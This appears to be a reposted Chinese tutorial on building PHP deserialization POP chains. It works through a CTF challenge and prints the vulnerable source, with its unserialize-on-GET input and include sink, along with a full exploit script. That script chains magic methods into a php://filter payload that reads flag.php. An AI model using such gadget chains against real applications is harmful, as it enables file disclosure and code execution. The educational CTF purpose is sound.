首頁 > 文章 > 後端開發 > 詳細介紹php反序列化pop鏈構造知識點

詳細介紹php反序列化pop鏈構造知識點

WBOY轉載: 2022-05-05 18:42:215584瀏覽

這篇文章為大家帶來了關於PHP的相關知識，其中主要介紹了關於pop鏈構造的相關問題，pop鍊是一種面向屬性編程，常用於構造調用鏈的方法，下面一起來看一下，希望對大家有幫助。

隨著對反序列化學習的不斷深入，我們來學習一下pop鏈的構造。這個pop鏈對於我這種小白來說還是比較難理解的，再次寫下這篇文章總結一下，加深自己對構造pop鏈的理解。同時也是提供想要入坑的夥伴們一些理解。

pop鏈構造

一般的反序列化題目，存在漏洞或能注入惡意程式碼的地方在魔術方法中，我們可以透過自動呼叫魔術方法來達到攻擊效果。但是當注入點存在普通的類別方法中，透過前面自動呼叫的方法就失效了，所以我們需要找到普通類與魔術方法之間的聯繫，理出一種邏輯思路，透過這種邏輯思路來構造一條pop鏈，從而達到攻擊的目的。所以我們在做這類pop題目一定要緊盯魔術方法。

pop鏈簡介

它是一種物件導向編程，常用於建構呼叫鏈的方法。在題目中的程式碼裡找到一系列能呼叫的指令，並將這些指令整合成一條有邏輯的能達到惡意攻擊效果的程式碼，就是pop鏈（個人理解，歡迎師傅們提出意見）在構造pop鏈中，魔術方法必不可少。以下將透過一個範例來說pop鍊是怎麼建構的，以及具體建構的想法

上題目程式碼：

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

建構想法

##在建構呼叫鏈時，先找到呼叫鏈的頭和尾。頭一般都是能傳參以及可以反序列化的地方，而尾部一般都是可以執行惡意程式碼的地方。審計這個題的程式碼，頭是用get方式對pop傳參，而尾部是include包含函數。到這裡，我們應該都知道是要用php偽協定讀取flag檔的源碼。既然頭和尾都找到了，也知道攻擊方法了。那麼接下來找到題目中的魔術方法。

__invoke()    当一个类被当作函数执行时调用此方法。

__construct   在创建对象时调用此方法

__toString()  在一个类被当作字符串处理时调用此方法

__wakeup()    当反序列化恢复成对象时调用此方法

__get()       当读取不可访问或不存在的属性的值会被调用

題中一共有這五種魔術方法。接著找出普通類與魔術方法之間的關聯。

不難看出wakeup函數中有個preg_match函數，用於查找source中敏感的字串，我們可以從這裡開頭，將source賦予一個show類，那麼就會自動觸發toString函數，那麼現在就要在tostring方法中延申鍊子，那麼我們可以在totring方法中$this->str賦予test類，在test類讀取source變量，（因為test類中沒有source屬性，則是訪問了不可訪問的屬性）則會自動呼叫get魔術方法。可以發現get方法中有個函數調用，則我們可以將$this->p賦予Modifier類，會自動調用invoke方法，從而執行我們寫入的php偽協議（將Modifer類中的var屬性賦值為我們的惡意程式碼）

至此，我們建構pop鏈。

pop鏈講解

<?php
class Modifier {
	protected $var=&#39;php://filter/read=convert.base64-encode/resource=flag.php&#39;;
}
class Show{
	public $source;
	public $str;
	function _construct(){
		$this->source=$file;
	}
}
class Test{
	public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>

先把用到的類別寫出來，形成一個框架，再表示類別中的變數。分別將用到的類別進行實例化，這裡為什麼要new 兩次show（看程式碼應該能看懂，第一次是實例化show類別,第二次是將第一次實例化後的show類別中的source=第二次實例化的show）

在我們進行序列化的時候盡量用url編碼一下（在這個題中有protected修飾的屬性，會有不可見字元）

推薦學習：《

PHP影片教學》

以上是詳細介紹php反序列化pop鏈構造知識點的詳細內容。更多資訊請關注PHP中文網其他相關文章！

php include 字符串 protected var this

陳述：

本文轉載於：csdn.net。如有侵權，請聯絡admin@php.cn刪除

上一篇：使用xdebug調試php詳細教程下一篇：使用xdebug調試php詳細教程

看更多